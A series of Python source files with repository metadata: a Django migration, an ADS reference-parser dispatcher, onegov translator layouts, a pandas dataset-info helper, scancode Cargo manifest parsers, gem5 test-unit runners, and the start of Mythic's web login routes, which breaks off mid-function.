| null | null | null | easyml/mainsite/migrations/0015_auto_20181014_1837.py | evancasey1/EasyML | 69f0c246cb7e1d6f7167eb504c30693088e703fd | [
"MIT"
]
| 1 | 2020-10-25T08:14:33.000Z | 2020-10-25T08:14:33.000Z | # Generated by Django 2.1.2 on 2018-10-14 18:37
from django.db import migrations
import picklefield.fields
class Migration(migrations.Migration):
dependencies = [
('mainsite', '0014_mlmodel_type_num'),
]
operations = [
migrations.AlterField(
model_name='mlmodel',
name='data',
field=picklefield.fields.PickledObjectField(editable=False),
),
]
| 21.2 | 72 | 0.629717 | 313 | 0.738208 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.224057 |
908bf756c481540c4c44d86144640fa2370be038 | 1,563 | py | Python | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | adsrefpipe/refparsers/handler.py | golnazads/ADSReferencePipeline | 802f26a9e085e6ff5de43f3b5642b2d9fad52cbb | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
from adsrefpipe.refparsers.CrossRefXML import CrossReftoREFs
from adsrefpipe.refparsers.ElsevierXML import ELSEVIERtoREFs
from adsrefpipe.refparsers.JATSxml import JATStoREFs
from adsrefpipe.refparsers.IOPxml import IOPtoREFs
from adsrefpipe.refparsers.SpringerXML import SPRINGERtoREFs
from adsrefpipe.refparsers.APSxml import APStoREFs
from adsrefpipe.refparsers.NatureXML import NATUREtoREFs
from adsrefpipe.refparsers.AIPxml import AIPtoREFs
from adsrefpipe.refparsers.WileyXML import WILEYtoREFs
from adsrefpipe.refparsers.NLM3xml import NLMtoREFs
from adsrefpipe.refparsers.AGUxml import AGUtoREFs
from adsrefpipe.refparsers.arXivTXT import ARXIVtoREFs
def verify(parser_name):
"""
:param parser_name: parser name from db
:return:
"""
# based on parser name return the parser class, if it is an xml
if parser_name == 'CrossRef':
return CrossReftoREFs
if parser_name == 'ELSEVIER':
return ELSEVIERtoREFs
if parser_name == 'JATS':
return JATStoREFs
if parser_name == 'IOP':
return IOPtoREFs
if parser_name == 'SPRINGER':
return SPRINGERtoREFs
if parser_name == 'APS':
return APStoREFs
if parser_name == 'NATURE':
return NATUREtoREFs
if parser_name == 'AIP':
return AIPtoREFs
if parser_name == 'WILEY':
return WILEYtoREFs
if parser_name == 'NLM':
return NLMtoREFs
if parser_name == 'AGU':
return AGUtoREFs
if parser_name == 'arXiv':
return ARXIVtoREFs
return None
| 32.5625 | 67 | 0.723608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.152271 |
908cafca02ccd9dbc79045504cbba8cbd1494065 | 12,221 | py | Python | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | src/onegov/translator_directory/layout.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
]
| null | null | null | from cached_property import cached_property
from purl import URL
from onegov.translator_directory import _
from onegov.core.elements import Block, Link, LinkGroup, Confirm, Intercooler
from onegov.core.utils import linkify
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.translator_directory.collections.documents import \
TranslatorDocumentCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.constants import member_can_see, \
editor_can_see, GENDERS, ADMISSIONS, PROFESSIONAL_GUILDS, \
INTERPRETING_TYPES
class DefaultLayout(BaseLayout):
@staticmethod
def linkify(text):
return linkify(text)
@staticmethod
def format_languages(languages):
return ', '.join(sorted((lang.name for lang in languages or [])))
def format_gender(self, gender):
return self.request.translate(GENDERS[gender])
@staticmethod
def format_drive_distance(number):
if not number:
return ''
return f'{number} km'
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
def format_admission(self, val):
return self.request.translate(ADMISSIONS[val])
def show(self, attribute_name):
"""Some attributes on the translator are hidden for less privileged
users"""
if self.request.is_member:
return attribute_name in member_can_see
if self.request.is_editor:
return attribute_name in editor_can_see
return True
def color_class(self, count):
""" Depending how rare a language is offered by translators,
apply a color code using the returned css class
"""
if count <= 5:
return 'text-orange'
def format_prof_guild(self, key):
return self.request.translate(PROFESSIONAL_GUILDS[key])
def format_interpreting_type(self, key):
return self.request.translate(INTERPRETING_TYPES[key])
class TranslatorLayout(DefaultLayout):
@cached_property
def file_collection(self):
return TranslatorDocumentCollection(
self.request.session,
translator_id=self.model.id,
category=None
)
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
title=_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
)
),
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit'
),
attrs={'class': 'edit-link'}
),
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this translator?"),
_("This cannot be undone."),
_("Delete translator"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
Link(
_('Documents'),
self.request.link(self.file_collection),
attrs={'class': 'documents'}
),
]
elif self.request.is_editor:
return [
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit-restricted'
),
attrs={'class': 'edit-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
]
elif self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(text=self.model.title)
]
return links
class EditTranslatorLayout(TranslatorLayout):
@cached_property
def title(self):
return _('Edit translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Edit')))
return links
class TranslatorCollectionLayout(DefaultLayout):
@cached_property
def title(self):
return _('Search for translators')
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
)
]
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
)
)
),
Link(
_('Export Excel'),
url=self.request.class_link(
TranslatorCollection, name='export'
),
attrs={'class': 'export-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
elif self.request.is_editor or self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
class AddTranslatorLayout(TranslatorCollectionLayout):
@cached_property
def title(self):
return _('Add translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
class TranslatorDocumentsLayout(DefaultLayout):
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(
text=self.model.translator.title,
url=self.request.link(self.model.translator)
),
Link(text=_('Documents'))
]
@cached_property
def upload_url(self):
url = URL(self.request.link(self.model, name='upload'))
url = url.query_param('category', self.model.category)
return self.csrf_protected_url(url.as_string())
def link_for(self, category):
return self.request.class_link(
self.model.__class__,
{'translator_id': self.model.translator_id, 'category': category}
)
class LanguageCollectionLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Languages')))
return links
@property
def editbar_links(self):
return [LinkGroup(
_('Add'),
links=(
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
),
)
)] if self.request.is_admin else []
class LanguageLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(
Link(_('Languages'),
url=self.request.class_link(LanguageCollection))
)
return links
class EditLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(self.model.name))
links.append(Link(_('Edit')))
return links
@cached_property
def editbar_links(self):
if self.request.is_admin:
if not self.model.deletable:
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Block(
_("This language is used and can't be "
"deleted."),
no=_("Cancel")
),
)
),
]
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this language?"),
_("This cannot be undone."),
_("Delete language"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
]
return []
class AddLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
| 31.17602 | 79 | 0.469274 | 11,487 | 0.939939 | 0 | 0 | 9,633 | 0.788233 | 0 | 0 | 1,356 | 0.110957 |
908cc9c6b5ff8ca35a1dc06753afe50c50104b9d | 1,169 | py | Python | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | src/dsanalizer/informations.py | perqu/Dataset-Analizer | c12ca74bd4f1e5969f0d90d6115a87ff3afd7f59 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import io
def info(df):
print("------------DIMENSIONS------------")
print("Rows:", df.shape[0])
print("Columns:", df.shape[1])
print("--------------DTYPES--------------")
columns = df.columns.tolist()
integers = df.select_dtypes("integer").columns.tolist()
floats = df.select_dtypes("float").columns.tolist()
bools = df.select_dtypes("bool").columns.tolist()
objects = df.select_dtypes("object").columns.tolist()
dataType = []
for el in columns:
if el in integers:
dataType.append('int')
if el in floats:
dataType.append('float')
if el in bools:
dataType.append('bool')
if el in objects:
dataType.append('object')
d = {'Column' : columns, 'Type': dataType}
print(pd.DataFrame(d))
print("----------MISSING VALUES----------")
print("Is any value missing? ", np.where(df.isnull().values.any() == False, "No", "Yes"), "\n")
buf = io.StringIO()
df.info(buf=buf)
info = buf.getvalue().split('\n')[-2].split(":")[1].strip()
print("----------MEMORY USAGE------------ \n", info) | 33.4 | 100 | 0.544055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.23781 |
908ec7d6f30da870417cfcc9194599857d219fff | 5,861 | py | Python | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 1,511 | 2015-07-01T15:29:03.000Z | 2022-03-30T13:40:05.000Z | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 2,695 | 2015-07-01T16:01:35.000Z | 2022-03-31T19:17:44.000Z | src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | d1e725d3603a8f96c25f7e3f7595c68999b92a67 | [
"Apache-2.0",
"CC-BY-4.0"
]
| 540 | 2015-07-01T15:08:19.000Z | 2022-03-31T12:13:11.000Z |
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import logging
import re
import attr
from packageurl import PackageURL
import toml
from commoncode import filetype
from commoncode import fileutils
from packagedcode import models
"""
Handle Rust cargo crates
"""
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
import sys
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
@attr.s()
class RustCargoCrate(models.Package):
default_type = 'cargo'
default_primary_language = 'Rust'
default_web_baseurl = 'https://crates.io'
default_download_baseurl = 'https://crates.io/api/v1'
default_api_baseurl = 'https://crates.io/api/v1'
@classmethod
def get_package_root(cls, manifest_resource, codebase):
return manifest_resource.parent(codebase)
def repository_homepage_url(self, baseurl=default_web_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
def repository_download_url(self, baseurl=default_download_baseurl):
if self.name and self.version:
return '{}/crates/{}/{}/download'.format(baseurl, self.name, self.version)
def api_data_url(self, baseurl=default_api_baseurl):
if self.name:
return '{}/crates/{}'.format(baseurl, self.name)
@attr.s()
class CargoToml(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.toml',)
extensions = ('.toml',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return filetype.is_file(location) and fileutils.file_name(location).lower() == 'cargo.toml'
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
core_package_data = package_data.get('package', {})
name = core_package_data.get('name')
version = core_package_data.get('version')
description = core_package_data.get('description')
if description:
description = description.strip()
authors = core_package_data.get('authors')
parties = list(party_mapper(authors, party_role='author'))
declared_license = core_package_data.get('license')
package = cls(
name=name,
version=version,
description=description,
parties=parties,
declared_license=declared_license
)
yield package
@attr.s()
class CargoLock(RustCargoCrate, models.PackageManifest):
file_patterns = ('Cargo.lock',)
extensions = ('.lock',)
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return (filetype.is_file(location)
and fileutils.file_name(location).lower() == 'cargo.lock')
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
package_data = toml.load(location, _dict=dict)
package_dependencies = []
core_package_data = package_data.get('package', [])
for dep in core_package_data:
package_dependencies.append(
models.DependentPackage(
purl=PackageURL(
type='crates',
name=dep.get('name'),
version=dep.get('version')
).to_string(),
requirement=dep.get('version'),
scope='dependency',
is_runtime=True,
is_optional=False,
is_resolved=True,
)
)
yield cls(dependencies=package_dependencies)
def party_mapper(party, party_role):
"""
Yields a Party object with party of `party_role`.
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
"""
for person in party:
name, email = parse_person(person)
yield models.Party(
type=models.party_person,
name=name,
role=party_role,
email=email)
def parse_person(person):
"""
https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
A "person" is an object with an optional "name" or "email" field.
A person can be in the form:
"author": "Isaac Z. Schlueter <[email protected]>"
For example:
>>> p = parse_person('Barney Rubble <[email protected]>')
>>> assert p == ('Barney Rubble', '[email protected]')
>>> p = parse_person('Barney Rubble')
>>> assert p == ('Barney Rubble', None)
>>> p = parse_person('<[email protected]>')
>>> assert p == (None, '[email protected]')
"""
parsed = person_parser(person)
if not parsed:
name = None
parsed = person_parser_no_name(person)
else:
name = parsed.group('name')
email = parsed.group('email')
if name:
name = name.strip()
if email:
email = email.strip('<> ')
return name, email
person_parser = re.compile(
r'^(?P<name>[^\(<]+)'
r'\s?'
r'(?P<email><([^>]+)>)?'
).match
person_parser_no_name = re.compile(
r'(?P<email><([^>]+)>)?'
).match
| 28.590244 | 99 | 0.61696 | 3,604 | 0.614912 | 2,304 | 0.393107 | 3,634 | 0.620031 | 0 | 0 | 1,992 | 0.339874 |
90918aea55bbacc028653f4732ff48d1cf1a76ea | 10,268 | py | Python | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
| 135 | 2016-10-21T03:31:49.000Z | 2022-03-25T01:22:20.000Z | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
| 35 | 2017-03-10T17:57:46.000Z | 2022-02-18T17:34:16.000Z | tests/testing/units.py | mandaltj/gem5_chips | b9c0c602241ffda7851c1afb32fa01f295bb98fd | [
"BSD-3-Clause"
]
| 48 | 2016-12-08T12:03:13.000Z | 2022-02-16T09:16:13.000Z | #!/usr/bin/env python2.7
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from abc import ABCMeta, abstractmethod
from datetime import datetime
import difflib
import functools
import os
import re
import subprocess
import sys
import traceback
from results import UnitResult
from helpers import *
_test_base = os.path.join(os.path.dirname(__file__), "..")
class TestUnit(object):
"""Base class for all test units.
A test unit is a part of a larger test case. Test cases usually
contain two types of units, run units (run gem5) and verify units
(diff output files). All unit implementations inherit from this
class.
A unit implementation overrides the _run() method. The test runner
calls the run() method, which wraps _run() to protect against
exceptions.
"""
__metaclass__ = ABCMeta
def __init__(self, name, ref_dir, test_dir, skip=False):
self.name = name
self.ref_dir = ref_dir
self.test_dir = test_dir
self.force_skip = skip
self.start_time = None
self.stop_time = None
def result(self, state, **kwargs):
if self.start_time is not None and "runtime" not in kwargs:
self.stop_time = datetime.utcnow()
delta = self.stop_time - self.start_time
kwargs["runtime"] = delta.total_seconds()
return UnitResult(self.name, state, **kwargs)
def ok(self, **kwargs):
return self.result(UnitResult.STATE_OK, **kwargs)
def skip(self, **kwargs):
return self.result(UnitResult.STATE_SKIPPED, **kwargs)
def error(self, message, **kwargs):
return self.result(UnitResult.STATE_ERROR, message=message, **kwargs)
def failure(self, message, **kwargs):
return self.result(UnitResult.STATE_FAILURE, message=message, **kwargs)
def ref_file(self, fname):
return os.path.join(self.ref_dir, fname)
def out_file(self, fname):
return os.path.join(self.test_dir, fname)
def _read_output(self, fname, default=""):
try:
with open(self.out_file(fname), "r") as f:
return f.read()
except IOError:
return default
def run(self):
self.start_time = datetime.utcnow()
try:
if self.force_skip:
return self.skip()
else:
return self._run()
except:
return self.error("Python exception:\n%s" % traceback.format_exc())
@abstractmethod
def _run(self):
pass
class RunGem5(TestUnit):
"""Test unit representing a gem5 run.
Possible failure modes:
- gem5 failed to run -> STATE_ERROR
- timeout -> STATE_ERROR
- non-zero exit code -> STATE_ERROR
Possible non-failure results:
- exit code == 0 -> STATE_OK
- exit code == 2 -> STATE_SKIPPED
"""
def __init__(self, gem5, gem5_args, timeout=0, **kwargs):
super(RunGem5, self).__init__("gem5", **kwargs)
self.gem5 = gem5
self.args = gem5_args
self.timeout = timeout
def _run(self):
gem5_cmd = [
self.gem5,
"-d", self.test_dir,
"--stats-file", "text://stats.txt?desc=False",
"-re",
] + self.args
try:
with ProcessHelper(gem5_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, gem5_stdout, gem5_stderr = p.call(timeout=self.timeout)
except CallTimeoutException as te:
return self.error("Timeout", stdout=te.stdout, stderr=te.stderr)
except OSError as ose:
return self.error("Failed to launch gem5: %s" % ose)
stderr = "\n".join([
"*** gem5 stderr ***",
gem5_stderr,
"",
"*** m5out/simerr ***",
self._read_output("simerr"),
])
stdout = "\n".join([
"*** gem5 stdout ***",
gem5_stdout,
"",
"*** m5out/simout ***",
self._read_output("simout"),
])
# Signal
if status < 0:
return self.error("gem5 terminated by signal %i" % (-status, ),
stdout=stdout, stderr=stderr)
elif status == 2:
return self.skip(stdout=stdout, stderr=stderr)
elif status > 0:
return self.error("gem5 exited with non-zero status: %i" % status,
stdout=stdout, stderr=stderr)
else:
return self.ok(stdout=stdout, stderr=stderr)
class DiffOutFile(TestUnit):
"""Test unit comparing and output file and a reference file."""
# regular expressions of lines to ignore when diffing outputs
diff_ignore_regexes = {
"simout" : [
re.compile('^Redirecting (stdout|stderr) to'),
re.compile('^gem5 compiled '),
re.compile('^gem5 started '),
re.compile('^gem5 executing on '),
re.compile('^command line:'),
re.compile("^Couldn't import dot_parser,"),
re.compile("^info: kernel located at:"),
re.compile("^Couldn't unlink "),
re.compile("^Using GPU kernel code file\(s\) "),
],
"simerr" : [
#re.compile('^Simulation complete at'),
],
"config.ini" : [
re.compile("^(executable|readfile|kernel|image_file)="),
re.compile("^(cwd|input|codefile)="),
],
"config.json" : [
re.compile(r'''^\s*"(executable|readfile|kernel|image_file)":'''),
re.compile(r'''^\s*"(cwd|input|codefile)":'''),
],
}
def __init__(self, fname, **kwargs):
super(DiffOutFile, self).__init__("diff[%s]" % fname,
**kwargs)
self.fname = fname
self.line_filters = DiffOutFile.diff_ignore_regexes.get(fname, tuple())
def _filter_file(self, fname):
def match_line(l):
for r in self.line_filters:
if r.match(l):
return True
return False
with open(fname, "r") as f:
for l in f:
if not match_line(l):
yield l
def _run(self):
fname = self.fname
ref = self.ref_file(fname)
out = self.out_file(fname)
if not os.path.exists(ref):
return self.error("%s doesn't exist in reference directory" \
% fname)
if not os.path.exists(out):
return self.error("%s doesn't exist in output directory" % fname)
diff = difflib.unified_diff(
tuple(self._filter_file(ref)),
tuple(self._filter_file(out)),
fromfile="ref/%s" % fname, tofile="out/%s" % fname)
diff = list(diff)
if diff:
return self.error("ref/%s and out/%s differ" % (fname, fname),
stderr="".join(diff))
else:
return self.ok(stdout="-- ref/%s and out/%s are identical --" \
% (fname, fname))
class DiffStatFile(TestUnit):
"""Test unit comparing two gem5 stat files."""
def __init__(self, **kwargs):
super(DiffStatFile, self).__init__("stat_diff", **kwargs)
self.stat_diff = os.path.join(_test_base, "diff-out")
def _run(self):
STATUS_OK = 0
STATUS_NEW_STATS = 1
STATUS_FAILED = 2
stats = "stats.txt"
cmd = [
self.stat_diff,
self.ref_file(stats), self.out_file(stats),
]
with ProcessHelper(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
status, stdout, stderr = p.call()
if status in (STATUS_OK, STATUS_NEW_STATS):
return self.ok(stdout=stdout, stderr=stderr)
elif status == STATUS_FAILED:
return self.failure("Statistics mismatch",
stdout=stdout, stderr=stderr)
else:
return self.error("diff-out returned an error: %i" % status,
stdout=stdout, stderr=stderr)
| 34.689189 | 79 | 0.602357 | 7,852 | 0.764706 | 312 | 0.030386 | 48 | 0.004675 | 0 | 0 | 4,017 | 0.391215 |
9091ee961b1819c72143e6265ce0d0dcec7d5ad2 | 19,042 | py | Python | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 934 | 2020-08-13T15:32:30.000Z | 2022-03-31T20:41:21.000Z | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 88 | 2020-08-13T18:59:11.000Z | 2022-03-31T23:48:18.000Z | mythic-docker/app/routes/routes.py | rmusser01/Mythic | 48d3f6b0b1bbb4858e5f43a5c6528644b0751bc9 | [
"BSD-3-Clause"
]
| 161 | 2020-08-13T17:28:03.000Z | 2022-03-19T14:56:34.000Z | from app import (
mythic,
links,
nginx_port,
listen_port,
mythic_admin_password,
mythic_admin_user,
default_operation_name,
mythic_db
)
import app
import asyncpg
import redis
from peewee_async import Manager
from sanic.response import json
from sanic import response
from sanic.exceptions import (
NotFound,
Unauthorized,
MethodNotSupported,
SanicException,
RequestTimeout,
)
import sys
from jinja2 import Environment, PackageLoader
from app.database_models.model import (
Operator,
Operation,
OperatorOperation,
ATTACK,
Artifact,
)
import datetime
import app.crypto as crypto
from sanic_jwt import BaseEndpoint, utils, exceptions
from sanic_jwt.decorators import scoped, inject_user
import ujson as js
from ipaddress import ip_address
from app.routes.authentication import invalidate_refresh_token
import app.database_models.model as db_model
from sanic.log import logger
from uuid import uuid4
import asyncio
env = Environment(loader=PackageLoader("app", "templates"), autoescape=True)
async def respect_pivot(my_links, request):
# given the links dictionary, update the server_ip and server_port to match what was received
# this will allow people using pivots (127.0.0.1:8888) to still access things going through to IP:other_port
updated_links = my_links
host_field = request.host.split(":")
if len(host_field) == 1:
server_ip = host_field[0]
if 'x-forwarded-port' in request.headers:
server_port = request.headers["x-forwarded-port"]
else:
if request.scheme == "https":
server_port = nginx_port
else:
server_port = listen_port
else:
server_ip = host_field[0]
server_port = host_field[1]
updated_links["server_ip"] = server_ip
updated_links["server_port"] = server_port
updated_links["login"] = "/login"
return updated_links
async def getSchemes(request):
if 'x-forwarded-proto' in request.headers:
if request.headers['x-forwarded-proto'] == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
if request.scheme == "http":
return {"http": "http", "ws": "ws"}
else:
return {"http": "https", "ws": "wss"}
@mythic.route("/")
@inject_user()
@scoped("auth:user")
async def index(request, user):
template = env.get_template("main_page.html")
content = template.render(
name=user["username"],
links=await respect_pivot(links, request),
current_operation=user["current_operation"],
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
** await getSchemes(request)
)
return response.html(content)
class Login(BaseEndpoint):
async def get(self, request):
error = ""
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
config={},
view_utc_time=False,
** await getSchemes(request)
)
return response.html(content)
async def post(self, request):
form = request.form
error = ""
username = None
ip = request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip
from app.api.operation_api import send_all_operations_message
try:
username = form["username"][0] if 'username' in form and len(form['username']) > 0 else ""
password = form["password"][0] if 'password' in form and len(form['password']) > 0 else ""
user = await app.db_objects.get(db_model.operator_query, username=username)
if user.id == 1 and user.failed_login_count > 10 and (user.last_failed_login_timestamp
> datetime.datetime.utcnow() + datetime.timedelta(seconds=-60)):
# throttle their attempts to log in to 1 min between checks
error = "Too many failed login attempts, try again later"
user.failed_login_count += 1
user.last_failed_login_timestamp = datetime.datetime.utcnow()
await app.db_objects.update(user)
await send_all_operations_message(message=f"Throttling login attempts for {user.username} due to too many failed login attempts\nLast connection from {ip}",
level="warning", source="throttled_login_" + user.username)
elif not user.active:
error = "Account is not active, cannot log in"
await send_all_operations_message(message=f"Deactivated account {user.username} trying to log in from {ip}",
level="warning", source="deactivated_login_" + user.username)
elif await user.check_password(password):
try:
# update the last login time to be now
user.last_login = datetime.datetime.utcnow()
user.failed_login_count = 0
await app.db_objects.update(user)
if user.current_operation is not None:
# update that operations' event log that the user just signed in
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=user.current_operation,
message="{} signed in from {}".format(user.username, ip),
)
(
access_token,
output,
) = await self.responses.get_access_token_output(
request,
{"user_id": user.id, "auth": "cookie"},
self.config,
self.instance,
)
refresh_token = (
await self.instance.auth.generate_refresh_token(
request, {"user_id": user.id, "auth": "cookie"}
)
)
output.update(
{self.config.refresh_token_name(): refresh_token}
)
template = env.get_template("login.html")
content = template.render(
links=await respect_pivot(links, request),
error=error,
access_token=access_token,
** await getSchemes(request),
refresh_token=refresh_token,
config={},
view_utc_time=False,
)
resp = response.html(content)
# resp = response.redirect("/")
resp.cookies[
self.config.cookie_access_token_name()
] = access_token
resp.cookies[self.config.cookie_access_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_access_token_name()][
"samesite"
] = "strict"
resp.cookies[
self.config.cookie_refresh_token_name()
] = refresh_token
resp.cookies[self.config.cookie_refresh_token_name()][
"httponly"
] = True
resp.cookies[self.config.cookie_refresh_token_name()][
"samesite"
] = "strict"
